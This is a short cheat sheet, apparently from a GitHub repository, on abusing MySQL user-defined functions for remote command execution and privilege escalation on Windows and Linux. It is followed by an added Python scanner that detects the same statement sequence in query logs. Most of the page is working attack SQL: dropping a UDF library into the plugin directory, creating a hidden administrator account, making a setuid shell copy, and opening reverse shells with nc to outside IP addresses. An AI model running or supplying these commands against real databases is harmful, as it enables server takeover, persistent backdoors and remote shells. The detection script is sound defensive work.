MySQL User Defined Functions Exploitation to RCE or PrivEsc Simple Cheat Sheet.

koparmalbaris/MySQL-UDF-Exploitation

MySQL UDF Exploitation Simple Cheat Sheet

There is a TR blog post covering this MySQL UDF exploitation methodology.

Setup for Windows

select @@version_compile_os, @@version_compile_machine;
select @@plugin_dir;
select load_file('\\\\10.0.0.5\\share\\lib_mysqludf_sys_64.dll') into dumpfile "<Plugin-Directory>\\udf.dll";
create function sys_bineval returns int soname 'udf.dll';
create function sys_eval returns string soname 'udf.dll';
select * from mysql.func where name = 'sys_bineval';
select * from mysql.func where name = 'sys_eval';

Execute Commands Samples for Windows

select sys_eval('dir C:\\Users\\4rch\\Desktop\\');
select sys_exec("net user 4rchantos Passwd1 /add");
select sys_exec("net localgroup Administrators 4rchantos /add");
select sys_eval("net use X: \\\\10.0.0.5\\share /user:user passwd");
select sys_eval("C:\\Users\\4rch\\Desktop\\nc.exe -e cmd.exe 192.168.49.125 80");

Setup for Linux

select @@version_compile_os, @@version_compile_machine;
show variables like '%plugin%';
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/lib_mysqludf_sys_64.so'));
select * from foo into dumpfile '<Plugin-Directory>/raptor_udf.so';
create function do_system returns integer soname 'raptor_udf.so';
select * from mysql.func;
select do_system('<command>');

Execute Privilege Escalation Commands Samples for Linux

select do_system('cp /bin/bash /tmp/4rch; chmod +xs /tmp/4rch');
/tmp/4rch -p
select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
\! sh

Execute Command Samples for Linux

select do_system('id > /var/www/output; chown www-data www-data  /var/www/output');
select do_system('nc 10.0.0.5 1337 -e /bin/bash');
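
Detection side of the steps above, as an added example that is not part of the original repository: a Python scanner that flags the statement sequence this cheat sheet relies on (library written with INTO DUMPFILE, CREATE FUNCTION ... SONAME, then calls to the new function). It assumes SQL statements have already been extracted from the MySQL general query log or an audit log; `scan` and `SAMPLE` are hypothetical names, and the sample statements are constructed from the commands on this page.

```python
import re

# Patterns for the statements used in the setup sections of this cheat sheet.
DUMPFILE = re.compile(r"into\s+dumpfile\s+['\"](?P<path>[^'\"]+)['\"]", re.I)
CREATE_UDF = re.compile(
    r"create\s+(?:aggregate\s+)?function\s+(?P<name>\w+)\s+returns\s+\w+"
    r"\s+soname\s+['\"](?P<lib>[^'\"]+)['\"]", re.I)
LOAD_UNC = re.compile(r"load_file\s*\(\s*['\"]\\\\", re.I)  # load_file('\\... (UNC share)
LIB_EXT = (".dll", ".so")


def basename(path):
    """Last path component, for both Windows and POSIX separators."""
    return re.split(r"[\\/]+", path)[-1].lower()


def scan(queries):
    """Return (index, severity, reason) findings for an ordered list of SQL statements."""
    findings, dropped, udfs = [], set(), set()
    for i, q in enumerate(queries):
        if LOAD_UNC.search(q):
            findings.append((i, "medium", "load_file() reading from a UNC path"))
        m = DUMPFILE.search(q)
        if m and basename(m["path"]).endswith(LIB_EXT):
            dropped.add(basename(m["path"]))
            findings.append((i, "high", f"library written via INTO DUMPFILE: {basename(m['path'])}"))
        m = CREATE_UDF.search(q)
        if m:
            lib, name = basename(m["lib"]), m["name"].lower()
            udfs.add(name)
            # Registering a library that was dropped earlier in the same log is the full chain.
            sev = "critical" if lib in dropped else "high"
            findings.append((i, sev, f"UDF {name} registered from {lib}"))
            continue
        for n in sorted(udfs):
            if re.search(rf"\b{re.escape(n)}\s*\(", q, re.I):
                findings.append((i, "critical", f"call to runtime-registered UDF {n}"))
    return findings


# Constructed sample statements mirroring the commands on this page.
SAMPLE = [
    "select * from orders where id = 7",
    r"select load_file('\\\\10.0.0.5\\share\\lib_mysqludf_sys_64.dll') into dumpfile '<Plugin-Directory>\\udf.dll'",
    "create function sys_eval returns string soname 'udf.dll'",
    r"select sys_eval('dir C:\\Users\\4rch\\Desktop\\')",
    "create function do_system returns integer soname 'raptor_udf.so'",
    "select do_system('<command>')",
]

if __name__ == "__main__":
    for idx, severity, reason in scan(SAMPLE):
        print(f"[{severity}] statement {idx}: {reason}")
```

Both `load_file()` and `INTO DUMPFILE` require the FILE privilege and are restricted by `secure_file_priv`, so reviewing those two settings and the contents of `mysql.func` complements the log-based check.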
